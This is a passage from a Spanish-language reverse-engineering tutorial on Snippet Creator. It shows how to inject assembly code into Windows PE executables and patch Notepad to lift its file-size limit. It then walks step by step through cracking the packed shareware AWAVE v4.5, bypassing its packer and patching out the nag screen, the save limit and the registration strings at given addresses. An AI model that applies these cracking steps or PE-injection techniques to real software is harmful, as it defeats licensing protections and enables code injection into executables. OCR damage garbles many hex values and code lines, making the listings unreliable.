mejor opción ya que no tiene que crearse una nueva sección ni aumenta 
el tamaño del archivo. 


Tomaremos la opción c. Abrimos el target con un editor hexadecimal y buscamos un 
área vacía, llena de ceros. Una vez encontrada, anotamos el desplazamiento donde 
empieza y el desplazamiento donde termina. En NEWPAD.EXE hayamos un gran 
espacio en el desplazamiento 4020h. Luego, empleando el comando "PE Info/View 
Section Info", abrimos el diálogo "Section Information" y en la columna "RAW offset" 
revisamos en cual sección se halla el espacio que he elegido. Es la sección .data. Luego 
calculamos la dirección virtual equivalente al desplazamiento dentro del archivo: 


VA del recorte = (Desplazamiento del recorte - RawOffset de la Sección) + (ImageBase 
+ VirtualOffset de la sección) 


(00004020h - 00003E00h) + (00400000h + 00006000h) = 00406220h 
Colocamos este valor en el campo "Snippet VA" del diálogo "Project Options”. 


6.2. Según sea la opción que hayamos elegido, hay que indicarlo en el área "Patch 
Options" de la caja de diálogo "Project Options". Elijamos "Patch into Existing Section". 


6.3. Después de escoger dónde insertar el recorte, debmos decidir como el recorte ha de 
tomar el control. 


Si queremos que el código se ejecute antes del código del archivo objeto 
o víctima, debemos redirigir el control desde el punto de entrada RVA 
(opción "Redirect Entry Point RVA”). Con esta opción, Window$ dará 
el control a tu recorte cuando el archivo esté listo para ser ejecutado. 


Si queremos que el recorte reciba el control después de que algunas 
rutinas del archivo objeto se hayna ejecutado, debemos elegir entre dos 
opciones: "redirect-from-code-section" (redirigir-desde-la-sección-de- 
código) o "redirect-from-call/¡mp" (redirigir-desde-call/¡mp). La opción 
"redirect-from-code-section" insertará las instrucciones en la dirección 
virtual que pasará el control al recorte. Sin embargo, debes tener 
cuidado al elegir la dirección desde dónde redirigirás el control: debe 
estar en el límte de una instrucción. Por ejemplo, para una sección como 
esta: 


:00401007 6819304000 push 00403019 

:0040100C 6A00 push 00000000 

* Reference To: USER32.MessageBoxA, Ord:0195h | 
:0040100E E807000000 Call 0040101 A 

:00401013 6A00 push 00000000 


puedes escoger 40100C como la dirección de redirección, pero no 
40100D. Snippet Creator no será capaz de capturar este tipo de error, así 
que debes ser cuidadoso en esto. Para pasar el control al recorte, Snippet 
Creator reemplazará la(s) instruccion(es) en esa dirección virtual con 
"push [VA del recorte]" y luego"ret". 


Redirection from call/jmp es otro método. Esta opción requiere que se 
diga a Snippet Creator donde está la instrucción call/¡mp y 
automáticamente reemplazará la instrucción original call/¡mp con la 
dirección de tu recorte. En este ejemplo, si empleamos esta opción, 
debemos pasar 40100E como la dirección virtual que redirigirá el 
control. Snippet Creator almacena esta dirección, la de rutina original, 
en una variable llamada OriginalLocation. Luego, si se desea entregar 
de nuevo el control a la rutina original, en el recorte se puede hacer algo 
como "jmp dword ptr [OriginalLocation]" o "call dword ptr 
[OriginalLocation]", dependiendo de si originalmente era una llamada 
(call) o un salto (jump). 


Si prefieres redirigir el control desde algún sitio en el código existente, 
puedes almacenar las instrucciones sobre-escritas después de que tu 
recorte obtenga el control. Lo puedes hacer estableciendo la caja de 
chequeo (checkbox) restore-overwritten-instruction en la parate inferior 
del cuadro de diálogo "Project Option". Snippet Creator colocará el 
código necesario para restaurar las instrucciones originales dentro del 
recorte. 


Luego, hay que considerar qué hacer después de que la última 
instrucción del recorte haya sido ejecutada. Se puede elegir devolver el 
control al archivo objeto (target) en una dirección virtual específica. Si 
no, se debería poner alguna instrucción que sería la última del recorte, 
tal como ExitProcess. 


En nuestro caso particular, ya hemos calculamos el nuevo punto de entrada: 00406220h. 
Como queremos que nuestro recorte tome el control al iniciar el programa, elegimos la 
opción "Redirect Entry Point RVA". Esto dará el control al recorte desde el comienzo. 
Además queremos que el programa siga su curso después de la ejecución del recorte, 
entonces elegimos la opción "Return To Program" y en la casilla "Virtual Address" 
colocamos la dirección del punto de entrada original: 00401000. 


6.4. Una vez establecidas las opciones del proyecto, se inserta el recorte en el archivo 
objeto usando "Action/Patch Target File". Snippet Creator no preservará 
registros/banderas (flags), es tu responsabilidad. Si algo no funciona como se esperaba, 
se puede examinar el código fuente del recorte en el directorio del proyecto y ver cómo 
va la cosa. 


Esto es todo. 


Ahora activemos el target (NEWPAD). ¿Qué te parece? 


Compara el tamaño del NEWPAD.EXE con el de NOTEPAD.EXE. ¡No hay cambios! 


lez termina su tutorial recordando que SC puede ser emlpeado también como un simple editor de 
archivos PE, lo mismo que ProcDump. 


ALGUNOS TIPS 


Ya jugamos un poco. Ahora hagamos cosas interesantes. Mi objetivo no es enseñar realmente a manejar 
este programa, sino aprender de él. De todos modos daré antes unos tips que pueden ser útiles, si se te 
ocurren más truquitos te agradecería muchísimo que me informes. 


Importar una función nueva 


En el ejemplo del tutorial de Icz, nos encontramos con que las funciones de la API de W32 que llamamos 
deben estar incluidas en la tabla de nombres importados del archivo objeto. ¿Por qué? 


Recordemos la razón por la cual se ha incluido una tabla de nombres importados entre los múltiples 
encabezados de los archivos con formato PE: 


Cuando se llama a una función en otro módulo (por ejemplo, GetMessage en USER32.DLL), la 
instrucción CALL emitida por el compilador no transfiere el control directamente a la función en la DLL. 
En vez de eso, la instrucción call transfiere control a una instrucción JMP DWORD PTR [XXXXXXXX] 
que está en la sección .text. La instrucción JMP conduce indirectamente a través de una variable 
DWORD en la sección .idata. Esta variable DWORD de la sección .idata contiene la dirección real del 
punto de entrada de la función del sistema operativo. De esta manera, al hacer todas las llamadas a una 
función dada de una DLL a través de una localización, el cargador no necesita parchar cada instrucción 
que llama (calls) a una DLL. Todo lo que tiene que hacer el cargador del PE es poner la dirección 
correcta de la función objeto (target) dentro de la variable DWORD en la sección .idata. Ninguna de las 
instrucciones call necesitan ser parchadas. 


Otro es el caso de los archivo NE, donde cada segmento contiene una lista de "fixups" que necesitan ser 


aplicados al segmento. Si el segmento llama a una función de una DLL dada 20 veces, el cargador debe 
escribir la dirección de esa función 20 veces en el segmento. 


Esta es la razón por la cual se utilizan los archivos .LIB al enlazar programas con MASM o TASM. Los 
archivos .LIB contienen las direcciones de las funciones a ser importadas desde el archivo a crear. 


Esto viene a colación porque es algo que debemos tomar en cuenta al enlazar los archivos .OBJ y cuando 
insertamos el recorte en el archivo objeto (target) si trabajamos con Snippet Creator. Aunque 
ensamblemos con éxito un recorte con Snippet Creator, podemos toparnos con que el archivo objeto 
(target) no incluye alguna de las funciones importadas por el recorte entre las funciones importadas, cuya 
lista se encuentra en la sección .idata. Esto puede ser solucionado rápidamente con Snippet Creator. 


Si es el caso que el archivo objeto no importa alguna función llamada por el nuevo recorte, entonces 
activamos el comado "Options/Add New Imports" y se abrirá el cuadro de diálogo "Add new import 
functions": 


Examinamos (pulsamos el botón "Browse") y buscamos la DLL donde se encuentra la función que 
deseamos importar. Si no sabes en cuál DLL se encuentra la función que deseas importar, busca en tu 
"Win32 Programmer's Reference” la información de la función que te interesa y en la parte superior haz 
click con el botón izquierdo del ratón sobre "QuickInfo". Aquí encontrarás en cuál .LIB del sistema se 
encuentra la función API que llamas. Esta .LIB tiene el mismo nombre de su .DLL correspondiente. Una 
vez determinado el módulo donde está la función a importar, marcas con el ratón la función que te 
interesa, pulsas "Add" y ya está importada esta función dentro del archivo objeto (el target). 


Un ejemplo práctico de esto lo encontraremos un poco más adelante. 


El recorte es grande y no quiero aumentar el programa 


En estos caso lo mejor, en mi opinión, es implementar una DLL. Así sólo tengo que insertar la llamada a 
la DLL en el archivo objeto y listo. Si no sabes qué es una DLL, como se programa, y para qué sirve, 
revisa el final de este documento. 


Ejemplo: 


Este tutorial viene acompañado con el archivo NAG.DLL (está en SNIP.ZIP) ¿Qué hace? Ya veremos. 
Mientras tanto, coloca NAG.DLL en el mismo directorio de NEWPAD.EXE (Siempre que uses este 
archivo haz un respaldo). Lo que vamos a hacer es que NEWPAD llame a esta DLL y active el programa 
que está en ella. Esta vez vamos a emplear TASM 5.0. Así que vamos a "Action/Options" y en el diálogo 
"General Options" elegimos TASM. 


Abrimos el proyecto NEWPAD y escribimos en la ventana de edición de SC las siguientes líneas de 
código: 


extrn GetModuleHandleA:Proc 
extrn MessageBoxA:Proc 
extrn LoadLibraryA:Proc 

extrn FreeLibrary:Proc 


jmp init 


hInst dd O 
DLLname db "NAG.DLL",0 


init: 
; Obtener el manejador del modulo que se está cargando en memoria 
push 0 
call GetModuleHandleA 
mov [hInst], eax 
; Ejecutar el programa en la DLL 
push offset DLLname ; Cargar en RAM NAG.DLL 
call LoadLibrary A 
push eax 
call FreeLibrary ; Liberar NAG.DLL de la memoria 


Lo que hace este código es obtener el manejador del módulo NEWPAD y ejecutar el código en la DLL. 
Ejecutado este código se libera la DLL. 


Ahora ensamblamos el código escrito. Saldrá el mensaje "You use a function that is not present in the 
target file" (Usas una función no presente en el archivo objeto). Es decir, las funciones que llamamos 
(LoadLibrary y FreeLibrary) no aparecen en la lista de funciones importadas por NEWPAD. Esto, como 
ya lo hemos mencionado, es sencillo de solucionar: 


1. Vamos a "Action/Add New" Imports y abriremos el cuadro de diálogo "Add new 
import functions”. 


2. Examinamos (pulsamos el botón "Browse") y buscamos la DLL donde se encuentra la 
función que deseamos importar. Buscamos KERNEL32.DLL elgimos LoadLibrary y 
FreeLibrary. Pulsamos "Add". 


Agregadas las nuevas funciones importadas, buscamos un espacio en NEWPAD para ubicar el recorte. 
Ya hemos encontrado que hay espacio en el desplazamiento 4020h del archivo. Ya hemos calculado la 
dirección virtual correspondiente a este desplazamiento con una fórmula como esta: 


[RVA de la sección + Image Base] + [offset del recorte - RAW data de la sección] 
[006000h + 00400000h] + [4020h - 3E00h] = 00406220h 


Anotamos este valor en el campo "Snippet VA" del cuadro de diálogo "Project Options". Aprovechamos 
también para elegir "Patch into Existing Section". 


Como vamos a ejecutar el recorte al inicio del programa, elegimos la opción "Redirect EntryPoint RVA" 
del diálogo "Project Options" y colocamos en el campo "Virtual Address" la dirección virtual del punto 
de entrada original: 00401000. 


Todo listo. Sólo activamos el comando Action/Patch Target, y ya. 
Ahora activemos NEWPAD: ¡sorpresa! 


¿Te gusta? 


Perfeccionando programas : Eliminar una limitación de notepad 


Ahora vamos a intentar solucionar un aspecto desagradable de NOTEPAD.EXE: el límite que impone al 
tamaño de los archivos que puede leer. Todos sabemos que si tenemos un archivo ASCII mayor de 65 KB 
y lo intentamos abrir con NOTEPAD, saldrá un mensaje que dice: "Este archivo es demasiado grande 
para abrirlo con el block de notas...”. Si decidimos abrirlo, el archivo es abierto por WORDPAD.EXE. El 
mismo límite se presenta cuando estamos escribiendo en archivo y superamos el límite de los 65 KB; sale 
un mensaje que dice: "No hay suficiente memoria para realizar esta operación...”. 


La razón del límite impuesto al tamaño de los archivos que podemos abrir con NOTEPAD es que el 
contenido de los archivos que abrimos con este programa es desplegado en una clase de ventana llamada 
control "Edit". Expliquemos esto. 


Cuando se hacen programas para Windows con interface gráfica se tienen que crear ventanas.Para crear 
las ventanas, los programas primero definen una plantilla para la ventana llamada "Clase de Ventana". 
Luego a partir de esta clase, el programa crea la ventana propiamente dicha. Es decir, las ventanas se 
crean a partir de plantillas llamadas clases de ventanas. 


Un programa Windows standard con interface gráfica tiene por lo menos dos partes: un procedimiento 
principal llamado WinMain y un procedimiento de ventana que podriamos llamar WndProc. La 
definición de la clase de ventana y la creación de la ventana misma se realiza en WinMain. La manera 
como se comporta el programa para cada una de las acciones que realicemos sobre él (abrir un archivo, 
copiar un fragmento, etc.) está codificada en WndProc. En pseudo código: 


WinMain: 


ClaseDeVentana = Registrar_ClaseDe(Ventana) 
Ventanal = CrearVentanaCon(ClaseDeVentana) 


Dispensador de Mensajes(Ventanal) 
WndProc: 


Para acción1 en (Ventanal), hacer: 
reacción1 


Para acción2 en (Ventanal), hacer: 
reacción2 


etc... 


Lo cierto es que un programa Windows tiene que registrar una clase de ventana que sirva como interface 
gráfica. Generalmente, los programas implementan más de una ventana, creandose así una jerarquía de 
ventanas. Tenemos entonces una ventana principal llamada ventana padre y una o más ventanas llamadas 
ventanas hijas. Notepad, por ejemplo, posee una ventana principal, sobre la que están los menúes, y por 
lo menos una ventana hija, la ventana de edición donde leemos y escribimos archivos. 


Windows suministra varias clases de ventanas predeterminadas, que el programador no necesita registrar. 
Estas ventanas predeterminadas son los llamados controles. Los controles incluyen botones, casillas de 
chequeo, algunos diálogos y ventanas de edición. Nos interesa este último tipo de control: el control 
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Edit". 


Se trata de una ventana que nos permite editar texto, la ventana de edición empleada por NOTEPAD. 
Este control presenta un inconveniente: no puede editar archivos mayos de 65 KB. Afortunadamente, 
Windows suministra otro tipo de ventana de edición que salva este límite: el control "RichEdit". 
Entonces, para superar el problema de limitación de NOTEPAD sólo tenemos que reemplazar un control, 
el control Edit, por otro, el control RichEdit. ¿Cómo lo hacemos? 


Veamos como un programa implementa un control de ventana hija Edit. 


1. Registrar la clase de la ventana principal. Se emplea la función RegisterClassExA. 
Esto se realiza en el procedimiento WinMain. 


2. Crear la ventana principal a partir de la clase registrada. Se emplea la función 

Create Windows, la cual regresa en el registro EAX un valor, llamado el manejador de 
ventana (hWnd), que permite una manipulación ágil de la ventana creada. La llamada a 
esta función (generalmente realizada inmediatamente después de registrar la clase de 
ventana en WinMain) hará que el sistema envíe una orden a la ventana que se está 
creando. Esta orden se llama WM_CREATE y es procesada por WndProc. 


3. Al procesar el mensaje WM_CREATE, WndProc crea la ventana hija a partir de la 
clase predeterminada control de ventana hija Edit. Emplea una vez más la función 
Create Windows. Esta función tiene entre sus parámetros uno donde debe incluirse el 
manejador de la ventana padre (nWnd, el 9no. parámetro) y otro que debe incluir el 
nombre de la ventana (por ejemplo, Edit; es el 2do. parámetro). 


¿Qué encontramos aquí? Bueno, que para reemplazar un control de edición por otro sólo tenemos que 
reemplazar el nombre pasado como parámetro en la llamada a la función Create Window que crea la 
ventana de edición. Así de sencillo. 


Manos a la obra. 


Abramos NOTEPAD con un heditor hexadecimal. Busquemos la cadena "Edit". Encontraremos dos. Una 
en el desplazamiento 3F90h y otra en 3FD4h. Cualquiera sea la cadena empleada por el programa para 
crear la ventana de edición se hará a través de un llamado a Create Windows que debe incluir una 
instrucción con la siguiente forma: 


push offset dir_virtual_del nombre _del_control 


call Create Window 


En optal, la instrucción que nos interesa tiene la forma: 68 XX XX XX XX, donde 68 es la instrucción 
PUSH y XX XX XX XX es la dirección virtual donde se encuentra la cadena con el nombre del control 
de edición. 


Calculemos la dirección virtual para las cadenas con el nombre Edit. 


Las cadenas se encuentran en la sección .data para la cual tenemos los siguientes valores: 


RVA Offset = 6000h 
RAW Data = 3E00h 


La base de la imagen es 00400000h. Ahora procedamos: 


Dir Virtual = (Desplazamiento del dato - RawData) + (ImageBase + RVA Offset) 


(3F90h - 3E00h) + (00406000h) = 00406190h 
(3FD4h - 3E00h) + (00406000h) = 004061D4h 


Ahora veamos si encontramos la instrucción que buscamos: 


1.68 90 61 0040 -> push 00406190 
2.68 D4 61 00 40 -> push 004061D4 


En el desplazamiento 1BA5h encontraremos 68 90 61 00 40 68 ... Esta debe ser la instrucción. 
Calculemos la dirección virtual correspondiente a esta instrucción. Suponemos que está en la sección 
.text, que es la sección de código, con: 


RVA Offset = 1000h 
RAW Data = 0400h 


Aplicando la fórmula tenemos: 


Dir Virtual = (Desplazamiento del dato - RawData) + (ImageBase + RVA Offset) 


(1BASh - 0400h) + (00401000h) = 004027A5h 


Podemos verificar con SICE. Cargamos en el loader NEWPAD.EXE. Cuando se inicia el programa 
hacemos BPX 4027A3 y ES. La ejecución se dentendrá en: 


004027A5 6890614000 push 00406190h ; Dir de la cadena "Edit" 
004027AA 6800020000 push 00002000h 
004027AF FFD7 call EDI ; Llamar a Create WindowExA 


Si subimos en la ventana de código de SICE encontraremos: 
00402719 8B3DC4734000 mov edi, [USER32!CreateWindowExA] 
Si hacemos D 00406190, veremos en la ventana de datos de SICE: Edit. 


Hemos encontrado donde es creada la ventana de edición en NEWPAD. Lo que tenemos que hacer es 
colocar en alguna parte de NEWPAD la cadena "RichEdit", calcular su dirección virtual y reemplazar en 
la instrucción 4027A5h la dirección virtual empujada a la pila por la nueva. 


Abramos NOTEPAD con el editor hexadecimal. Hayamos un espacio en 41E0h, dentro de la sección de 
datos. Escribimos ahí "RichEdit". La dirección virtual equivalente de este desplazamiento es: 


(41E0h - 3E00) + 00406000 = 004063E0h 

Ahora reemplazamos en el desplazamiento 1BA5h la cadena 
68 90 61 40 00 -> push 00406190 

por la cadena: 


68 E0 63 40 00 -> push 040063E0 


Sin embargo, con esto no es suficiente. Los controles comunes se encuentran en el archivo 
COMCTL32.dll. Pero el control RichEdit se encuentra en RICHED32.DLL. Así que tendremos que 
cargar en el espacio de direcciones del proceso de NEWPAD a RICHED32.DLL. Aquí entra en juego 
Snippet Creator. 


Después de las configuraciones de rutina escribimos la siguiete rutina en la ventana de edición de Snippet 
Creator: 


extrn GetModuleHandleA Proc 
extrn LoadLibraryA:Proc 
extrn FreeLibrary:Proc 


jmp init 


hInst dd 0 
DLLname db "NAG.DLL",0 
RichEditName db "RichEd32.d11".0 


init: 

push 0 

call GetModuleHandleA 

mov [hInst], eax 

; Cargar la librería para el control RichEdit 
push offset RichEditName 

call LoadLibraryA 


Ensamblamos este código (con TASM) y parchamos NEWPAD. 


Ahora podremos abrir archivos sin limitación de tamaño. Lo único es que cuando sobrepasemos ese 
tamaño, no podremos escribir sobre NEWPAD. 


Podríamos cambiar nuestro código de esta manera, y también funcionaría: 


extrn GetModuleHandleA:Proc 
extrn LoadLibraryA:Proc 


jmp init 


hInst dd O 
RichEditName db "RichEd32.d11".0 
RichEditStr db "RichEdit",0 


init: 
push 0 


call GetModuleHandleA 

mov [hInst], eax 

; Cargar la librería para el control RichEdit 

push offset RichEditName 

call LoadLibraryA 

; Reemplazar las instrucciones 

lea es1,RichEditStr ; Dir de la cadena 

mov edi1,004027A5h ; Dir de la instrucción a cambiar 
mov dword ptr [edi+1],esi ; Nueva dir 


De esta manera nos liberamos de buscar donde escribir la cadena "RichEdit" y del cálculo de su dirección 
virtual. Pero para que este parche funcione necesitamos cambiar los atributos de la sección de código 
«text, si no al ejecutar este código se producirá un error de protección. 


Abrimos en Snippet Creator el cuadro de diálogo "Section Information” con el comando "PE Info/View 
Section Info". Sobre la sección .text hacemos click con el boton derecho del ratón y elegimos de ese 
menú "Edit Section". Vemos que el campo "Characteristics" = 60000020. Si pulsamos el botón "..." se 
desplegarán los atributos de esta sección. Veremos que no se incluye el atributo de escritura, así que 
hacemos click en IMAGE_SCN_ MEM_WRITE., Cerramos esta ventana y veremos "Charactheristics” = 
E0000020. Ahora sí se puede sobreescribir esta sección cuando está en memoria. 


Todavía nos quedan un par de mensajes fastidiosos. Los que hemos comentado al comienzo. 
Librémosnos de ellos. 


NAG 1: 


Nos libramos de la primera ventana si reemplazamos la instrucción 


00402E8B 81 FEFFFFO000O cmp esi,0O00FFFERL ; El archivo a abrir es mayor a 65 KB? 
00402E91 OFSFECO10000 jg 004083 ; Si es mayor, no cargarlo y mostrar mensaje 


Por: 


00402E8B EB OA jmp 402E97h ; Saltarse la prueba y abrir archivo 


NAG2: 


Nos libramos de la segunda ventana si reemplazamos la instrucción: 


00401E1A 7415 3200401E31h 


por: 


00401E1A EB10 jmp 401E2Ch 


En vez de parchar con el editor hexadecimal, agreguemos las siguientes instrucciones a nuestro recorte: 


¡Eliminar NAG1: ¿abrir con WORDPAD? 

mov edi1,402E8Bh 

mov word ptr [edi],OVDAEBh 

¡Eliminar NAG2: No hay memoria para escribir 
mov edi,401E1Ah 

mov word ptr [edi],O010EBh 


Ahora sí. Hemos roto los límites de lectura de NEWPAD. Nos quedaría todavía romper los límites de 
escritura... 


Todo el recorte para romper los límites de tamaño de archivo que puede abrir notepad sería: 


extrn GetModuleHandleA:Proc 
extrn LoadLibraryA:Proc 


jmp init 


hInst dd O 
RichEditName db "RichEd32.d11".0 
RichEditStr db "RichEdit",0 


init: 

push 0 

call GetModuleHandleA 

mov [hInst], eax 

; Cargar la librería para el control RichEdit 

push offset RichEditName 

call LoadLibraryA 

; Reemplazar las instrucciones 

lea es1,RichEditStr ; Dir de la cadena 

mov edi1,004027A5h ; Dir de la instrucción a cambiar 
mov dword ptr [edi+1],esi ; Nueva dir 

; Eliminar NAG]: ¿abrir con WORDPAD? 

mov edi,402E8Bh 

mov word ptr [edi],OVDAEBh 

; Eliminar NAG2: No hay memoria para escribir 
mov edi,401E1Ah 

mov word ptr [edi],010EBh 


Observaciones: 


Bueno, quisiera decir que ahora sí tenemos un block de notas más potente. Pero para que esta afirmación 
sea una realidad tenemos que eliminar todavía algunos bugs remanentes: 


- El límite de los 65 KB ha sido sólo superado para lectura, no para escritura. 
- Cuando pegamos un fragmento de texto desde el ClipBoard, se duplica el pegado. 


Son unos bugs importantes. Con un poco de trabajo podemos corregirlo. Pero dado que nuestro interés es 
aprender a inyectar código nuevo en archivo PE usando Snippet Creator, el trabajo que invertiríamos 
corrigiendo estos bugs preferiríamos usarlo haciendo nuestro propio editor, por supesto, en lenguaje 
ensamblador, para que sea más rápido, pequeño y potente que NOTEPAD. Realmente este camino sería 
el más fácil. 


Esta vez la insersión del recorte ha aumentado un poco el tamaño del archivo. ¿Por qué? porque hemos 
insertado una nueva función a importar: LoadLibraryA. Snippet Creator ha creado una nueva sección al 
final del archivo. Por este motivo, sería mejor encontrar otro método que nos permita evitar esto. 
Posiblemente, si nos tomamos un tiempo podremos resolver este problema manualmente. 


Mantener el tamaño del archivo parchado es importante y en todo caso debe evitarse. Esto permite el uso 
de motores creadores de rompedores (CRACKZ). Además, hay situaciones donde, por más cuidadosos 
que seamos al crear una nueva sección, el cambio de tamaño deteriorará el archivo. 


MALDITAS PROTECCIONES: quebrando AWAVE v4.5 


Parchando archivos empaquetados con SnippetCreator 


No soy ya muy asiduo a la eliminación de protecciones. Mi actividad se ha dirigido hacia otro oficio: 
mejorar los programas y poner al acceso de quien lo quiera de la posibilidad de hacerlo. Peor que 
desproteger un programa es hacerlo mejor y regalarlo. ¿Se puede hacer? Ya hemos visto que es posible al 
parchar NOTEPAD. 


Sin embargo haré un excepción. Voy a intentar desproteger un programita llamado AWAVE v4.5. Es un 
programa ejemplar para mostrar como romper protecciones de archivos ejecutables empaquetados a 
través de la inserción de código nuevo en ellos empleando Snippet Creator. Quiero subrayar que no tengo 
nada contra el programador que creó este buen programa. Por el trabajo que me dió, tengo la impresión 
de que sabía lo que hacía. Yo aconsejaría que quienes deseen usar el programa, lo registren. Si yo pudiera 
lo haría. Pero mi objetivo no es aprovechar el programa sino enseñar el estilo de romper protecciones que 
estoy implementando. 


Para romper las protecciones de archivos empaquetados, la táctica empleada generalmente es esperar que 
el archivo se despliegue en memoria y sobreescribir la rutina de protección en tiempo de ejecución. Esto 
comúnmente se ha hecho con un cargador (loader) que atrapa una llamada a alguna API de W32 que 
realice el programa, y entrega el control a la rutina que desprotegerá el programa: el mismo cargador 


tomará el control y cambiará en memoria el esquema de protección. 


El uso de loaders me parece que presenta una dificultad: en este método entran en juego dos procesos 
distintos, el del loader y el del programa mismo. Esto dificulta las cosas y nos obliga a escribir un número 
significativo de líneas de código. Las funciones de W32 para escribir procesos remotos, son complejas. 
El loader puede tener fácilmente un tamaño de 100 KB, especialmente si no lo escribimos en lenguaje 
ensamblador. 


S1 hacemos que la rutina que rompe las protecciones del programa se ejecuten en su propio proceso, me 
liberaré de la carga que implica enganchar instrucciones en procesos remotos, sobrescribir y leer procesos 
remotos, etc. Esto lo podemos lograr simplemente insertando la rutina desprotectora en el mismo 
ejecutable del programa. Veamos el caso particualr de AWAVE v4.5. 


El programa presenta dos limitaciones engorrosas. La primera es un NAG que aparece al comienzo y que 
recuerda que se trata de un programa no registrado y retarda el inicio del programa. La otra protección 
importante es que el programa no permite guardar más de un archivo por sección. Hay un par de 
cuestiones secundarias: son dos cadenas, una dice "Unregistered copy” y aparece en la parte izquierda del 
área cliente; la otra dice "(Unreg)" y aparece en la "Caption" de la ventana. Aunque no es tarea fácil, 
eliminaremos estas molestias. 


Si intentamos cargar el programa con SICE, no se disparará la ventana del depurador porque el programa 
está empaquetado y se han cambiado los atributos de las secciones. Entonces creamos en SnippetCreator 
un nuevo proyecto: awave, cuyo target sería awave.exe. Revisamos los atributos de las secciones y 
cambiamos los de las secciones .text y .adata, que son, respectivamente las secciones de código 
ejecutable y la rutina de descompresión. El punto de entrada está en esta última sección. Los atributos 
deben ser E0000020. 


Cambiados los atributos, encontramos que ahora si se dispara la ventana de SICE cuando cargamos 
awave.exe con SICE. Tenemos que buscar varias direcciones: 


1. La dirección donde finaliza la rutina de descompresión. Cuando el programa llega a 
este punto, ya el archivo está totalmente descomprimido en la memoria. 


2. Las direcciones de los puntos que deseamos cambiar o parchar. 


3. El desplazamiento en el archivo donde escribiremos el recorte nuevo. Esto no se hace 
con SICE sino con un editor hexadecimal. 


Como el archivo está empaquetado, existen diferencias sustanciales entre la lista muerta que es el archivo 
mismo y el código vivo ya desempacado que vemos con SICE. Por este motivo no sirve establecer el 
desplazamiento en el archivo correspondiente a las direcciones de memoria donde deben hacerse 
cambios. Así que la estrategia es agregar una rutina al programa que sobreescriba en tiempo de ejecución 
las rutinas que queremos cambiar. 


Otro cambio que debemos introducir al archivo es el concerniente a la instrucción que entregará el 


control a nuestro nuevo recorte. 

Determinemos el desplazamiento del recorte. Con el editor hexadecimal podemos ubicar un espacio vacío 
en el desplazamiento 0004 3140h. A partir de él y los calculamos la dirección virtual de su ubicación 
utilizando la fórmula: 


Dir Virtual = (Desplazamiento del dato - RawData) + (ImageBase + RVA Offset) 


Los datos que necesitamos para este cálculo los hallamos con el mismo Snippet Creator. 
En Snippet Creator activamos el comando "ActioniNew Target". Pulsamos BROWSE y 
ubicamos AWAVE.EXE y pulsamos SAVE. Ahora activamos "PE Info/View PE 
header". Encontramos que: 


ImageBase = 0040000h 
Luego activamos "PE Info/View Section Info". Para la sección .text encontramos: 


RawData = 1000h 
RVA Offset = 1000h 
RawSize = 042200h 


Comprobamos que es en esta sección donde se encuentra el desplazamiento para nuestro 
injerto. Ahora calculemos la dirección virtual: 


(43140h - 1000h) + (400000h + 1000h) = 00443140h 


Debemos entregar el control a esta rutina cuando el archivo ya esté desempacado. Con SICE hemos 
ubicado esta rutina: 


0050B54B  03854C504400 add eax,[ebp+004450AC] 


0050B551  5B pop eax 
0050B552  ..... 

0050B358 61 popad 
0050B559 7508 jnz 
0050B55B  B801000000 mov eax,l 
0050B560  02C000 ret OCh 
0050B563 50 push eax 
0050B564  C3 ret 


Debemos insertar en alguna parte de este código la siguiente instrucción, que entregará el control al 
recorte: 


68 00 443140 push 00443140h 
C3 ret 


Como vemos, la instrucción consta de seis bytes. Analizando el código de más arriba, vemos que la 
instrucción en 50B54B tiene ese tamaño, así que tomamos esa. Calculamos el desplazamiento en el 
archivo correspondiente a esta dir. virtual y es 05454Bh. Si revisamos con el editor hexadecimal este 
desplazamiento veremos que no se corresponden los valores con los que vemos en SICE. Lo que ocurre, 
me imagino, es que se trata de un desempacador compuesto de dos partes. El desempacador mismo está 
empacado. Hay pues dos desempacadores, uno desempaca el desempacador del programa. Así que 
necesitamos una dirección más: la dirección final del primer desempacador o ubicar una punto en el 
primer desempacador donde la instrucción que nos toca ya esté desempacada. Ubicada esta dirección, 
pasamos desde aquí el control al recorte; hacemos que el recorte escriba la instrucción 0050B54B para 
que vuelva a pasar el control al recorte, que romperá ahorá las protecciones sobre el archivo desplegado. 


Para hallarla, cargamos el ejecutable en SICE y hacemos: 


D 50B54B 


Esto desplegará en la ventana de datos de SICE el contenido en hexadecimal que hay en 0050B54B. 
Luego ejecutamos Fl0 hasta ver en la ventana de datos de SICE algo como esto: 0385AC504400. 


Yo he determinado esta dirección: 


0050B0B7  8B85B5504400 mov eax, [ebp + 004450B53] 


Como ven, la instrucción tiene seis bytes. 


El desplazamiento de esta dirección en el archivo es 0540B7h. Con el heditor hexadecimal escribimos en 
esta instrucción: 


68 40 31 44 00 C3 


que es el equivalente octal de las instrucciones "push 443140h" - "ret". Cuando se ejecute el programa y 
llegue a este punto, pasará el control a las rutinas escritas en el desplazamiento 43140h del archivo, 
coerrespondiente a la dirección virtual 00443140h del programa. 


La rutina del recorte deberá incluir una rutina que restaure la instrucción que hemos modificado (en 
0050B0B7) y que modifique el final del segundo desempacador, cuando el programa ya está totalmente 
desempacado, para que se entregue el control de nuevo a una rutina que introducirá por fín los cambios 
definitivos en el programa. 


Tenemos ya las siguientes direcciones: 


1. Dirección de la instrucción que entregará el control al recorte. Final del primer 
desempacador: SOBOB7h. La llamamos VA]1. 

2. Dirección del recorte en el archivo: 00443140h. VA2. 

3. Dirección de la instrucción que devolverá de nuevo el control al recorte 50B54Bh. La 


llamamos VA3. 


Ahora, queda romper las protecciones para obtener las últimas direcciones: las que hay que cambiar para 
desproteger el programa. Necesito estas direcciones para escribir el código del recorte. Por razones de 
tiempo no entraré en detalles y las daré de inmediato: 


1. Eliminar el NAG del comienzo: 


Reemplazar: 
0045041E  8B1584F84A00 mov edx,[004AF884] 


por: 
0045041E  EBI19 ¡mp 00450435 


Con esto saltamos por encima de la llamada a DialogBoxParam que despliega el NAG 
del comienzo. 


2. Perimitir que el programa guarde más de un archivo en cada sección: 


Reemplazar: 

0045FOFD —8A08 mov CL, [eax] 
por: 

0045FOFD  EBO8 jmp 455FOB 


Así saltamos la prueba que revisa si ya se ha guardado un archivo antes de la llamada a 
GetSaveFileName. 


3. Eliminar cadena "Unregistered copy": 


Colocar en 004A2100 un 00h. Esto coloca cero al comienzo de una cadena ASCIZ. 


4: Eliminar cadena "(Unreg)": 


Colocar en 0049FCD3 un 00h. 


El código de parche rompedor sería entonces algo como esto: 


.model flat, STDCALL 


Jmp init: 


OldInstruction1 db 08Bh,085h,0B5h,050h,044h,000h 
OldInstruction2 db 003h,085h,0ACh,050h,044h,000h 
